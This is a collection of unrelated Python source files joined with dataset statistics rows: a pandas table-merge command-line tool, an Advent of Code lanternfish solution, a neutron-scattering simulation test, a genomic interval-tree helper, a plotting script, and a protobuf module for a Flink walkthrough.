of the columns in both DataFrames.', nargs='+')
parser.add_argument('-lo','--left_on', help='Column or index level names \
to join on in the left DataFrame. Can also be an array or list of arrays \
of the length of the left DataFrame. These arrays are treated as if \
they are columns.', nargs='+')
parser.add_argument('-ro','--right_on', help='Column or index level names \
to join on in the right DataFrame. Can also be an array or list of arrays \
of the length of the left DataFrame. These arrays are treated as if \
they are columns.', nargs='+')
parser.add_argument('-ml','--merge_left_index', help='Use the index from the left \
DataFrame as the join key(s). If it is a MultiIndex, the number of keys \
in the other DataFrame (either the index or a number of columns) must \
match the number of levels.', action='store_true', default=False)
parser.add_argument('-mr','--merge_right_index', help='Use the index from the right \
DataFrame as the join key(s). If it is a MultiIndex, the number of keys \
in the other DataFrame (either the index or a number of columns) must \
match the number of levels.', action='store_true', default=False)
parser.add_argument('-or','--order', help='Order the join keys \
lexicographically in the result DataFrame. If False, the \
order of the join keys depends on the join type (how keyword).', \
    action='store_true', default=False)
parser.add_argument('-su','--suffixes', help='Tuple of (str,str). Each str is a \
Suffix to apply to overlapping column names in the left and right side, \
respectively. To raise an exception on overlapping columns \
use (False, False). Default:(`_x`,`_y`)', nargs=2)
# Header / column-name handling for each input table.
parser.add_argument('-nl', '--noheader_l', action='store_true', default=False, \
    help='Set if `left_table` has no header. If this is set, \
user must also set `colnames_l`')
parser.add_argument('-nr', '--noheader_r', action='store_true', default=False, \
    help='Set if `right_table` has no header. If this is set, \
user must also set `colnames_r`')
parser.add_argument('-cl', '--colnames_l', nargs='+', \
    help='`If `noheader_l` is set, add column names \
to `left_table`. Otherwise, rename the columns.')
parser.add_argument('-cr', '--colnames_r', nargs='+', \
    help='`If `noheader_r` is set, add column names \
to `right_table`. Otherwise, rename the columns.')
# Delimiters and index columns.
parser.add_argument('--left_sep', '-sl', default="\t", \
    help='table delimiter of `left_table`. By default, \
the table is expected to be tab-delimited')
parser.add_argument('--right_sep', '-sr', default="\t", \
    help='table delimiter of `right_table`. By default, \
the table is expected to be tab-delimited')
parser.add_argument('--out_sep', '-so', default="\t", \
    help='table delimiter of `out_table`. By default, \
the out table will be tab-delimited')
parser.add_argument('--left_indexCol', '-il', \
    help='Column(s) to use as the row labels of the \
`left_table`, either given as string name or column index.')
parser.add_argument('--right_indexCol', '-ir', \
    help='Column(s) to use as the row labels of the \
`right_table`, either given as string name or column index.')
# Targeted per-column renames, given as old,new pairs.
parser.add_argument('-clc','--change_left_cols', nargs='+',
    help='list of specific column names you want to change in left table. \
For example, if you want to change columns `oldColName1` and \
`oldColName2` to `newColName1` \
and `newColName2`, respectively, then set this to \
`oldColName2,newColName1 oldColName2,newColName2`')
parser.add_argument('-crc','--change_right_cols', nargs='+',
    help='list of specific column names you want to change in right table. \
For example, if you want to change columns `oldColName1` and \
`oldColName2` to `newColName1` \
and `newColName2`, respectively, then set this to \
`oldColName2,newColName1 oldColName2,newColName2`')
#parser.add_argument('--header','-H', action='store_true', default=False, \
#	help='true if header in table')
args = parser.parse_args()
# ---- Validate CLI option combinations before touching any files. ----
# Each failing check exits with its original message.
if args.noheader_l and not args.colnames_l:
    sys.exit("Error: If `noheader_l` is set, user must also set `colnames_l`\n")
if args.noheader_r and not args.colnames_r:
    sys.exit("Error: If `noheader_r` is set, user must also set `colnames_r`\n")
# Wholesale column naming and targeted renames are mutually exclusive.
if args.change_left_cols and args.colnames_l:
    sys.exit("Error: Can only set one of these parameters:\n"
             "\t* change_left_cols\n"
             "\t* colnames_l\n")
if args.change_right_cols and args.colnames_r:
    sys.exit("Error: Can only set one of these parameters:\n"
             "\t* change_right_cols\n"
             "\t* colnames_r\n")
# At least one join-key option is required.
if not (args.on or args.left_on or args.right_on):
    sys.exit("Error: must set columns to join on.")
# 1. Read input files
def _read_table(path, sep, noheader, index_col):
    """Load one input table, applying that side's CLI options."""
    params = {"sep": sep}
    if noheader:
        params["header"] = None
    if index_col:
        params["index_col"] = index_col
    return pd.read_csv(path, **params)

# The left/right loading and renaming logic was duplicated line-for-line;
# factored into the helpers above/below so both sides share one code path.
left_df = _read_table(args.left_table, args.left_sep,
                      args.noheader_l, args.left_indexCol)
right_df = _read_table(args.right_table, args.right_sep,
                       args.noheader_r, args.right_indexCol)

# 2. Change/Update column names of the input tables
def _set_colnames(df, colnames):
    """Replace every column name; exits (original behavior) on a length mismatch."""
    if len(df.columns) != len(colnames):
        sys.exit(("ValueError: Length mismatch: Expected axis " +
                  "has %i elements, new values have %i elements") %
                 (len(df.columns), len(colnames)))
    df.columns = colnames
    return df

def _rename_cols(df, change_list, param_name):
    """Apply targeted old,new column renames; exits on a malformed pair."""
    for pair in change_list:
        if len(pair.split(",")) != 2:
            sys.exit(("ERROR: values set to `%s` must " % param_name) +
                     "be in the format [old_col_name],[new_column_name]")
    return df.rename(columns=dict(x.split(",") for x in change_list))

if args.colnames_l:
    left_df = _set_colnames(left_df, args.colnames_l)
if args.colnames_r:
    right_df = _set_colnames(right_df, args.colnames_r)
if args.change_left_cols:
    left_df = _rename_cols(left_df, args.change_left_cols, "change_left_cols")
if args.change_right_cols:
    right_df = _rename_cols(right_df, args.change_right_cols, "change_right_cols")
# 3. Set merge parameters
merge_param = {}
if args.how == "antileft":
    # A left anti-join keeps the left rows that have NO match in the right
    # table.  Implement it as a left join with an indicator column, then
    # keep only the rows that came exclusively from the left side.
    merge_param['how'] = "left"
    merge_param['indicator'] = True
else:
    merge_param['how'] = args.how
if args.on:
    merge_param['on'] = args.on
if args.left_on:
    merge_param['left_on'] = args.left_on
if args.right_on:
    merge_param['right_on'] = args.right_on
if args.merge_left_index:
    merge_param['left_index'] = args.merge_left_index
if args.merge_right_index:
    merge_param['right_index'] = args.merge_right_index
if args.order:
    merge_param['sort'] = args.order
if args.suffixes:
    merge_param['suffixes'] = args.suffixes

# 4. Perform Merge
merge_df = left_df.merge(right_df, **merge_param)

# 5. Export merged table
out_param = {}
out_param["sep"] = args.out_sep
if not args.left_indexCol:
    out_param["index"] = False
if args.how == "antileft":
    # BUG FIX: the original used `left_df.loc[merge_df.index, :]`, but
    # merge() returns a frame with a fresh RangeIndex, so that expression
    # merely re-selected the first len(merge_df) rows of left_df -- not an
    # anti-join at all.  With indicator=True above, keeping the
    # '_merge' == 'left_only' rows yields the true anti-join (right-side
    # columns are NaN for those rows).
    antimerge_df = merge_df[merge_df['_merge'] == 'left_only'].drop(columns='_merge')
    antimerge_df.to_csv(args.out_table, **out_param)
else:
    merge_df.to_csv(args.out_table, **out_param)
| 42.467662
| 85
| 0.72493
| 1,376
| 8,536
| 4.330669
| 0.172238
| 0.034737
| 0.065615
| 0.022151
| 0.564189
| 0.513677
| 0.454271
| 0.432119
| 0.356939
| 0.34687
| 0
| 0.006134
| 0.140581
| 8,536
| 201
| 86
| 42.467662
| 0.806161
| 0.055764
| 0
| 0.204819
| 0
| 0
| 0.162898
| 0.007952
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.024096
| 0
| 0.024096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c971e430652331e744f0b8b0fc1ac07db5704fb9
| 884
|
py
|
Python
|
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
# parse the input: one comma-separated line of lanternfish timer values
with open("6-input.txt") as infile:
    fish = [int(tok) for tok in infile.readline().split(",")]

# Bucket the school by timer value: startcounts[t] = number of fish at timer t.
startcounts = {t: 0 for t in range(9)}
for timer in fish:
    startcounts[timer] += 1
def updatedcounts(counts):
    """Advance the timer buckets by one day and return a new dict.

    Every timer decrements by one; fish at 0 reset to 6, and each of
    them spawns a newborn fish with timer 8.
    """
    shifted = {timer: counts[timer + 1] for timer in range(8)}
    shifted[6] += counts[0]  # parents reset to 6
    shifted[8] = counts[0]   # one newborn per parent, starting at 8
    return shifted
# Run part 1 (80 days) and part 2 (256 days) from the same starting
# distribution.  updatedcounts() returns a fresh dict each day, so
# startcounts itself is never mutated and can seed both runs.
# (The original duplicated this whole loop verbatim for each day count.)
for total_days in (80, 256):
    counts = startcounts
    for day in range(total_days):
        print(day, [counts[v] for v in range(9)])
        counts = updatedcounts(counts)
    print("\n\n", sum(counts.values()), "\n\n")
| 25.257143
| 59
| 0.616516
| 136
| 884
| 4.007353
| 0.308824
| 0.06422
| 0.044037
| 0.084404
| 0.388991
| 0.388991
| 0.278899
| 0.278899
| 0.278899
| 0.278899
| 0
| 0.04539
| 0.202489
| 884
| 34
| 60
| 26
| 0.72766
| 0.016968
| 0
| 0.296296
| 0
| 0
| 0.032295
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0
| 0
| 0.074074
| 0.148148
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97337433ecaa8303091ad4ba921fe29802304f0
| 3,287
|
py
|
Python
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 5
|
2017-01-16T03:59:47.000Z
|
2020-06-23T02:54:19.000Z
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 293
|
2015-10-29T17:45:52.000Z
|
2022-01-07T16:31:09.000Z
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 1
|
2019-05-25T00:53:31.000Z
|
2019-05-25T00:53:31.000Z
|
#!/usr/bin/env python
#
#
standalone = True
import os, numpy as np
os.environ['MCVINE_MPI_BINDING'] = 'NONE'
import unittestX as unittest
class TestCase(unittest.TestCase):
    """End-to-end check that a flat S(Q)=1 kernel produces flat simulated S(Q)."""

    def test1(self):
        'mccomponents.sample.samplecomponent: SQkernel'
        # The kernel spec is in sampleassemblies/V-sqkernel/V-scatterer.xml
        # It is a flat kernel S(Q)=1.
        # So the simulation result should have a flat S(Q) too.
        # The following code run a simulation with
        # (1) monochromatic source (2) sample (3) IQE_monitor
        # After the simulation, it test the S(Q) by
        # (1) do a manual "reduction" using the simulated scattered neutrons, and
        # (2) examine the monitor data
        import mcni
        from mcni.utils import conversion
        # instrument
        # 1. source: all neutrons at a single incident energy ei (meV)
        from mcni.components.MonochromaticSource import MonochromaticSource
        ei = 60.
        vil = conversion.e2v(ei)
        vi = (0, 0, vil)
        neutron = mcni.neutron(r=(0, 0, 0), v=vi, time=0, prob=1)
        component1 = MonochromaticSource('source', neutron)
        # 2. sample
        from mccomponents.sample import samplecomponent
        component2 = samplecomponent('sample', 'sampleassemblies/V-sqkernel/sampleassembly.xml')
        # 3. monitor
        import mcstas2
        component3 = mcstas2.componentfactory('monitors', 'IQE_monitor')(
            name='monitor', Ei=ei, Qmin=0, Qmax=8., Emin=-10., Emax=10., nQ=20, nE=20)
        # instrument and geometer: sample and monitor 1 m downstream of source
        instrument = mcni.instrument([component1, component2, component3])
        geometer = mcni.geometer()
        geometer.register(component1, (0, 0, 0), (0, 0, 0))
        geometer.register(component2, (0, 0, 1), (0, 0, 0))
        geometer.register(component3, (0, 0, 1), (0, 0, 0))
        # neutron buffer
        N0 = 10000
        neutrons = mcni.neutron_buffer(N0)
        #
        # simulate (fresh work directory each run)
        import mcni.SimulationContext
        workdir = "tmp.SQkernel"
        if os.path.exists(workdir):
            import shutil; shutil.rmtree(workdir)
        sim_context = mcni.SimulationContext.SimulationContext(outputdir=workdir)
        mcni.simulate(instrument, geometer, neutrons, context=sim_context)
        #
        # check 1: directly calculate I(Q) from neutron buffer
        from mcni.neutron_storage import neutrons_as_npyarr
        narr = neutrons_as_npyarr(neutrons); narr.shape = N0, 10
        v = narr[:, 3:6]; p = narr[:, 9]
        delta_v_vec = -v + vi; delta_v = np.linalg.norm(delta_v_vec, axis=-1)
        Q = conversion.V2K * delta_v
        I, qbb = np.histogram(Q, 20, weights=p)
        qbc = (qbb[1:] + qbb[:-1]) / 2
        I = I / qbc; I /= np.mean(I)
        # BUG FIX: the original tested `np.isclose(...).size / I.size > 0.9`,
        # but .size of the boolean array equals I.size regardless of its
        # values, so the assertion always passed.  .sum() counts the bins
        # actually close to 1, which is what "90% of bins are flat" means.
        self.assertTrue(1.0 * np.isclose(I, 1., atol=0.1).sum() / I.size > 0.9)
        #
        # check 2: use data in IQE monitor
        import histogram.hdf as hh
        iqe = hh.load(os.path.join(workdir, 'stepNone', 'iqe_monitor.h5'))
        iq = iqe.sum('energy')
        Q = iq.Q; I = iq.I
        I0 = np.mean(I); I /= I0
        # check that most of the intensity is similar to I0 (same fix as above)
        self.assertTrue(1.0 * np.isclose(I, 1., atol=0.1).sum() / I.size > 0.9)
        return

    pass  # end of TestCase
if __name__ == "__main__": unittest.main()
# End of file
| 35.728261
| 98
| 0.606632
| 434
| 3,287
| 4.532258
| 0.391705
| 0.014235
| 0.010676
| 0.006101
| 0.070158
| 0.050839
| 0.044738
| 0.044738
| 0.044738
| 0.044738
| 0
| 0.041509
| 0.274414
| 3,287
| 91
| 99
| 36.120879
| 0.783229
| 0.214177
| 0
| 0.039216
| 0
| 0
| 0.07648
| 0.031514
| 0
| 0
| 0
| 0
| 0.039216
| 1
| 0.019608
| false
| 0.019608
| 0.215686
| 0
| 0.27451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9743d63b6769b341831d17f36b94f9161097eb4
| 5,811
|
py
|
Python
|
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#
###############################################################################
# Author: Greg Zynda
# Last Modified: 12/11/2019
###############################################################################
# BSD 3-Clause License
#
# Copyright (c) 2019, Greg Zynda
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
from quicksect import IntervalTree
import logging
from differannotate.constants import FORMAT
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.WARN, format=FORMAT)
class dict_index(dict):
    '''
    A modified dictionary class meant to store and increment unique value
    IDs as values are retrieved from keys.  Assignment is a deliberate
    no-op: once a key has an ID it never changes.

    # Usage
    >>> DI = dict_index()
    >>> DI['cat']
    0
    >>> DI['bear']
    1
    >>> DI['cat']
    0
    >>> DI['cat'] = 10
    >>> DI['cat']
    0
    >>> DI.getkey(0)
    'cat'
    >>> DI.getkey(1)
    'bear'
    >>> DI.getkey(2)
    Traceback (most recent call last):
    ...
    KeyError: 2
    >>> DI.getkey('dog')
    Traceback (most recent call last):
    ...
    TypeError: dog
    '''
    def __init__(self):
        super(dict_index, self).__init__()
        # Next ID to hand out; also equals the number of distinct keys seen.
        self.cur = 0

    def __getitem__(self, key):
        # EAFP: first access of an unseen key assigns it the next ID.
        try:
            return super(dict_index, self).__getitem__(key)
        except KeyError:  # was a bare `except:`, which could mask real errors
            super(dict_index, self).__setitem__(key, self.cur)
            self.cur += 1
            return super(dict_index, self).__getitem__(key)

    def __setitem__(self, key, value):
        # Intentional no-op: IDs are immutable once assigned.
        pass

    def getkey(self, val):
        '''
        Reverse lookup: return the key whose assigned ID is `val`.

        # Parameters
        val (int): Should be < len(dict_index)
        # Raises
        TypeError: if val is not an integer
        KeyError: if val does not exist as a value in the dict_index
        '''
        if not isinstance(val, int):
            raise TypeError(val)
        if val >= self.cur:
            raise KeyError(val)
        # BUG FIX: under Python 3, dict .keys()/.values() return views,
        # which are not indexable -- the original `keys[vals.index(val)]`
        # raised TypeError.  Materialize them as lists first.
        keys = list(super(dict_index, self).keys())
        vals = list(super(dict_index, self).values())
        return keys[vals.index(val)]
class iterit(IntervalTree):
    """IntervalTree that tracks its own extent (so every interval can be
    iterated), adds filtered views, and caches set representations."""

    def __init__(self):
        super(iterit, self).__init__()
        # Running extent of all inserted intervals; None until the first add().
        self.min = None
        self.max = None
        # Memoizes to_set() results keyed by (eid, col, strand).
        self.set_cache = {}

    def add(self, start, end, other=None):
        # Track the global [min, max] extent so iterintervals() can search
        # the whole tree.
        if self.min is None:  # was `== None`; identity test is the idiom
            self.min = start
            self.max = end
        else:
            if start < self.min:
                self.min = start
            if end > self.max:
                self.max = end
        super(iterit, self).add(start, end, other)

    def iterintervals(self):
        # NOTE(review): raises if called before any add() (min/max are None).
        return super(iterit, self).search(self.min, self.max)

    def iifilter(self, eid, col, strand=False):
        '''
        >>> IT = iterit()
        >>> IT.add(0, 10, (0, 0))
        >>> IT.add(5, 15, (1, 1))
        >>> IT.add(10, 20, (1, 2))
        >>> ret = IT.iifilter(1,0)
        >>> len(ret)
        2
        >>> for i in map(interval2tuple, ret): print(i)
        (5, 15, 1, 1)
        (10, 20, 1, 2)
        '''
        # NOTE(review): the doctest above calls iifilter(1, 0), which this
        # assert rejects (col >= 1) -- one of the two is stale; preserved
        # as-is pending clarification.
        assert(col >= 1)
        if _strand(strand):
            sid = _get_strand(strand)
            return list(filter(lambda x: len(x.data) > col and x.data[col] == eid and x.data[0] == sid, self.iterintervals()))
        else:
            return list(filter(lambda x: len(x.data) > col and x.data[col] == eid, self.iterintervals()))

    def searchfilter(self, start, end, eid, col, strand=False):
        # Same filtering as iifilter, restricted to intervals overlapping
        # [start, end].
        assert(col >= 1)
        if _strand(strand):
            sid = _get_strand(strand)
            return list(filter(lambda x: len(x.data) > col and x.data[col] == eid and x.data[0] == sid, super(iterit, self).search(start, end)))
        else:
            return list(filter(lambda x: len(x.data) > col and x.data[col] == eid, super(iterit, self).search(start, end)))

    def to_set(self, eid=False, col=False, strand=False):
        # Cached set-of-tuples view; .copy() on both paths protects the
        # cache entry from caller mutation.
        cache_name = (eid, col, strand)
        if cache_name in self.set_cache:
            return self.set_cache[cache_name].copy()
        if eid or col or strand:
            ret = set(map(interval2tuple, self.iifilter(eid, col, strand)))
        else:
            ret = set(map(interval2tuple, self.iterintervals()))
        self.set_cache[cache_name] = ret
        return ret.copy()
def _strand(strand):
return not isinstance(strand, bool)
strand_dict = {'+':0, '-':1, 0:'+', 1:'-'}
def _get_strand(strand):
if isinstance(strand, int):
return strand
elif isinstance(strand, str):
return strand_dict[strand]
else:
raise ValueError(strand)
def interval2tuple(interval):
    '''
    Flatten an interval into a tuple: (start, end) followed by the
    elements of its data payload when one is present (truthy).
    '''
    endpoints = (interval.start, interval.end)
    if not interval.data:
        return endpoints
    return endpoints + tuple(interval.data)
if __name__ == "__main__":
    # Running this module directly executes the embedded doctests.
    import doctest
    doctest.testmod()
| 30.584211
| 134
| 0.66202
| 837
| 5,811
| 4.502987
| 0.293907
| 0.023879
| 0.016981
| 0.028655
| 0.24675
| 0.166092
| 0.150703
| 0.132661
| 0.132661
| 0.132661
| 0
| 0.018257
| 0.170539
| 5,811
| 189
| 135
| 30.746032
| 0.763693
| 0.441404
| 0
| 0.232558
| 0
| 0
| 0.004168
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 1
| 0.151163
| false
| 0.011628
| 0.046512
| 0.023256
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9743e069ad8fe0a795c53358dc5e0951de0d7c7
| 2,113
|
py
|
Python
|
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTs
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTs
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | 13
|
2017-08-03T22:30:25.000Z
|
2019-01-23T16:32:28.000Z
|
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTS
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
DOC="""plotCurve
plotCurve is used to create vertical profiles of different lateral ylabel statistics of FEOTS output.
Usage:
plotCurve plot <file> [--out=<out>] [--opts=<opts>] [--scalex=<scalex>] [--xlabel=<xlabel>] [--ylabel=<ylabel>]
Commands:
plot Create a vertical profile plot of the chosen statistics for the given FEOTS output ylabel.
Options:
-h --help Display this help screen
--out=<out> The path to place the output files [default: ./]
--opts=<opts> Comma separated list of plot options. [default: none]
--scalex=<scalex> Amount to scale the x dimension by for the plot (multiplicative). [default: 1.0]
--xlabel=<xlabel> Label for the x-dimension in the plot. [default: x]
--ylabel=<ylabel> Label for the y-dimension in the plot. [default: y]
"""
import numpy as np
from matplotlib import pyplot as plt
from docopt import docopt
import feotsPostProcess as feots
def parse_cli():
    """Parse command-line arguments with docopt, using the module-level
    DOC usage string as the grammar."""
    return docopt(DOC, version='plotCurve 0.0.0')
#END parse_cli
def loadCurve(filename):
    """Read a comma-separated curve file (first/header row skipped) into
    a numpy array."""
    return np.loadtxt(filename, delimiter=",", skiprows=1)
#END loadCurve
def plotCurve(curveData, opts, scalex, xlabel, ylabel, plotfile):
    """Plot curveData[:,1] against scaled curveData[:,0] with a shaded fill
    under the curve, and save the figure to `plotfile`.

    Parameters
    ----------
    curveData : 2-column array (x in column 0, y in column 1)
    opts      : list of option strings; 'logx'/'logy' select log axes
    scalex    : multiplicative factor applied to the x column
    xlabel, ylabel : axis labels
    plotfile  : output figure path
    """
    f, ax = plt.subplots()
    # BUG FIX: matplotlib Axes has no `fillbetween` method -- the correct
    # API is `fill_between`, so the original raised AttributeError on
    # every call.
    ax.fill_between(curveData[:, 0]*scalex, curveData[:, 1], color=(0.8, 0.8, 0.8, 0.8))
    ax.plot(curveData[:, 0]*scalex, curveData[:, 1], marker='', color='black', linewidth=2)
    if 'logx' in opts:
        ax.set(xscale='log')
    if 'logy' in opts:
        ax.set(yscale='log')
    ax.grid(color='gray', linestyle='-', linewidth=1)
    ax.set(xlabel=xlabel, ylabel=ylabel)
    f.savefig(plotfile)
    plt.close('all')  # free the figure so repeated calls don't accumulate
#END plotCurve
def main():
    """Entry point: parse the CLI and run the `plot` command."""
    args = parse_cli()
    if args['plot']:
        xlabel = args['--xlabel']
        # BUG FIX: docopt returns every option value as a string; plotCurve
        # multiplies the x column by scalex, so it must be numeric here.
        scalex = float(args['--scalex'])
        ylabel = args['--ylabel']
        opts = args['--opts'].split(',')
        curveData = loadCurve(args['<file>'])
        outFile = args['--out']
        plotCurve(curveData, opts, scalex, xlabel, ylabel, outFile)
#END main
if __name__ == '__main__':
main()
| 26.08642
| 114
| 0.644108
| 284
| 2,113
| 4.753521
| 0.380282
| 0.035556
| 0.006667
| 0.008889
| 0.140741
| 0.065185
| 0
| 0
| 0
| 0
| 0
| 0.012507
| 0.205395
| 2,113
| 80
| 115
| 26.4125
| 0.791543
| 0.030289
| 0
| 0
| 0
| 0.041667
| 0.462818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c974860e7717afdaa174abddb3959a9916ac8f90
| 6,535
|
py
|
Python
|
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | 1
|
2020-05-27T03:38:36.000Z
|
2020-05-27T03:38:36.000Z
|
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | null | null | null |
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | null | null | null |
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: walkthrough.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='walkthrough.proto',
package='walkthrough',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x11walkthrough.proto\x12\x0bwalkthrough\"\x16\n\x05Hello\x12\r\n\x05world\x18\x01 \x01(\t\"\x0e\n\x0c\x41notherHello\"\x18\n\x07\x43ounter\x12\r\n\x05value\x18\x01 \x01(\x03\"\x1d\n\nHelloReply\x12\x0f\n\x07message\x18\x01 \x01(\t\"\x07\n\x05\x45ventb\x06proto3')
)
_HELLO = _descriptor.Descriptor(
name='Hello',
full_name='walkthrough.Hello',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='world', full_name='walkthrough.Hello.world', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=56,
)
_ANOTHERHELLO = _descriptor.Descriptor(
name='AnotherHello',
full_name='walkthrough.AnotherHello',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=72,
)
_COUNTER = _descriptor.Descriptor(
name='Counter',
full_name='walkthrough.Counter',
filename=None,
